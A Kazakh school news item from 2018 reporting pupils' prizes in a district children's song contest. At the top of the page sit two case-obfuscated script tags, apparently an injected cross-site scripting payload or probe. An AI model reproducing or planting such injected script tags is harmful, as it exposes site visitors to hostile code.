<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.02.2018

Ғ.Әбдірахманұлы атындағы Қима орта мектебінің оқушылары ақпанның 23 жұлдызы күні өткізілген аудандық «Жас дарын» ән байқауында қатысып, жүлделі орынға ие болды. Содықтан да, ән байқауының тақырыбы «Рухани жаңғыру» деп аталды. Аудан көлемінде 16 мектеп қатысып, әр оқушы өзінің талантымен, мәдениеттілігімен, әнді мәнеріне жеткізе айту арқылы әділқазылар алқасының шешімімен жүлделі орындарға ие болды.

Бұл байқаудың мақсаты оқушылардың әнге деген қызығушылығын арттырумен қатар сахна мәдениетіне үйрете отырып, оқушылардың дарынды, талантты екенін көрсету.

Осы «Жас дарын» байқауы жас ерекшеліктеріне қарай 3 топқа бөлінді. 1-топ 6-10 жасқа дейін, 2-топ 11-13 жасқа дейін, 3-топ 14-17 жасқа дейін топтастырылды. Бұл байқауға біздің мектептен бастауыш сыныптардан Жәңгір Айсұлу қатысып, 3 орынға иеленсе, орта буыннан 5 сынып оқушылары Еркинова Саида, Куанышбай Нурай, Асылкулова Мадина белсене қатысқаны үшін грамотамен, Дарменова Гүлназ 8 сынып оқушысы 2 орынға иеленді.

Просмотров: 681


Пікір қосу



Деректерді қолтаңбаға қосу